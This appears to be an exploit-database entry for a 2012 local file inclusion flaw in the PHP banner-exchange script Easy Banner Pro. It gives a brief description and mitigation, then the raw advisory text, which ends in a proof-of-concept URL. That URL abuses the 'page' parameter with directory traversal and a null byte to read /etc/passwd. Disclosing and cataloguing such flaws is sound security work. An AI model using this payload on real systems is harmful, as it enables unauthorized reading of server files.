Easy Banner Pro (index.php page) Local file inclusion

vendor:

Easy Banner Pro

by:

Yakir Wizman

7,5

CVSS

HIGH

Local file inclusion

CWE

Product Name: Easy Banner Pro

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

Easy Banner Pro (index.php page) Local file inclusion

Local file inclusion vulnerability in Easy Banner Pro (index.php page) allows an attacker to include a file from the local system. An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable page with the malicious file path in the 'page' parameter.

Mitigation:

Input validation should be done to prevent the exploitation of this vulnerability.

Source

Exploit-DB raw data:

-----------------------------------------------------------
Easy Banner Pro (index.php page) Local file inclusion
Bug discovered by Yakir Wizman
Date 24/08/2012
Vendor Homepage - http://www.phpwebscripts.com/easybannerpro/
Demo - http://www.scripts-demo.com/easybannerpro/
ISRAEL
-----------------------------------------------------------
       Author will be not responsible for any damage.
-----------------------------------------------------------

About the Application
-----------------------------------------------------------
Easy Banner Pro is an advanced and very easy to use PHP script for running your own banner exchange system. 


Proof Of Conecpt
-----------------------------------------------------------
Local file inclusion (Severity is high)
Vulnerable URL	: http://server/easybannerpro/index.php?page=../../../../../../../../../../etc/passwd%00